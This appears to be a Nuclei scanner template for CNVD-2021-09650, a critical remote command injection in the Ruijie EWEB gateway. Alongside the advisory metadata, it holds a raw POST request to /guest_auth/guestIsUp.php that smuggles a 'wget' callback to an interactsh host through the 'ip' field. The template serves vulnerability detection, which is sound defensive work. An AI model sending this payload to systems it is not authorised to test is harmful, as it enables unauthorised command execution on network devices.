id: CNVD-2021-09650 info: name: Ruijie Networks-EWEB Network Management System - Remote Code Execution author: daffainfo,pikpikcu severity: critical description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks. reference: - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py - https://www.ruijienetworks.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 tags: ruijie,cnvd,cnvd2021,rce requests: - raw: - | POST /guest_auth/guestIsUp.php Host: {{Hostname}} mac=1&ip=127.0.0.1|wget {{interactsh-url}} unsafe: true matchers: - type: word part: interactsh_protocol name: http words: - "http" # Enhanced by mp on 2022/05/12